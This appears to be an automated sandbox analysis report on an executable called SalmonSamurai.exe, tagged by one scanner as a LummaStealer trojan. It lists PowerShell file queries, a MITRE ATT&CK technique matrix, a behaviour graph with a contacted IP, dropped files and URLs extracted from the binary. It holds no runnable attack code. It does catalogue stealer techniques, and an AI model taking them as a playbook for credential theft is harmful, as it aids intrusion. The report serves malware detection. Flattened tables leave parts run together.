Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		12
Process Injection		1
Masquerading		11
Input Capture		21
Security Software Discovery		Remote Services11
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
DLL Search Order Hijacking		1
DLL Side-Loading		41
Virtualization/Sandbox Evasion		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Search Order Hijacking		12
Process Injection		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Search Order Hijacking		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync32
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579955 Sample: SalmonSamurai.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 42 51 Multi AV Scanner detection for submitted file 2->51 8 SalmonSamurai.exe 89 2->8         started        process3 file4 39 C:\Users\user\AppData\...\SalmonSamurai.exe, PE32+ 8->39 dropped 41 C:\Users\user\AppData\...\vulkan-1.dll, PE32+ 8->41 dropped 43 C:\Users\user\AppData\...\vk_swiftshader.dll, PE32+ 8->43 dropped 45 5 other files (none is malicious) 8->45 dropped 53 Drops large PE files 8->53 12 SalmonSamurai.exe 3 8->12         started        signatures5 process6 dnsIp7 49 89.187.28.253, 49853, 80 UA-WICOMWiMAXUkraineAutonomousSystemUA Ukraine 12->49 15 powershell.exe 35 12->15         started        18 powershell.exe 12->18         started        20 powershell.exe 12->20         started        22 21 other processes 12->22 process8 dnsIp9 55 Loading BitLocker PowerShell Module 15->55 25 conhost.exe 15->25         started        27 conhost.exe 18->27         started        29 conhost.exe 20->29         started        47 chrome.cloudflare-dns.com 172.64.41.3, 443, 49782, 49783 CLOUDFLARENETUS United States 22->47 31 conhost.exe 22->31         started        33 conhost.exe 22->33         started        35 conhost.exe 22->35         started        37 18 other processes 22->37 signatures10 process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SalmonSamurai.exe30%ReversingLabsWin32.Trojan.LummaStealer

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://crbug.com/dawn/12760%Avira URL Cloudsafe
https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupport0%Avira URL Cloudsafe
https://crbug.com/dawn/5370%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
      		high
      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
        		high
        https://fr.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
          		high
          https://search.seznam.sk/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
            		high
            https://doh.familyshield.opendns.com/dns-querySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
              		high
              https://crbug.com/newSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                		high
                https://hk.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                  		high
                  https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                    		high
                    https://crbug.com/dawn/402SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                      		high
                      https://crbug.com/dawn/1393SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                        		high
                        http://i.wp.pl/a/i/stg/500/favicon.icohttp://szukaj.wp.pl/szukaj.html?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                          		high
                          https://crbug.com/dawn/1276SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://crbug.com/1338622.SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                            		high
                            https://dns11.quad9.net/dns-querySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                              		high
                              https://crbug.com/1214923SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                		high
                                https://suggestplugin.gmx.co.uk/s?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                  		high
                                  https://ca.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                    		high
                                    https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                      		high
                                      http://www.walla.co.il/favicon.icohttp://search.walla.co.il/?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                        		high
                                        https://www.givero.com/suggest?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
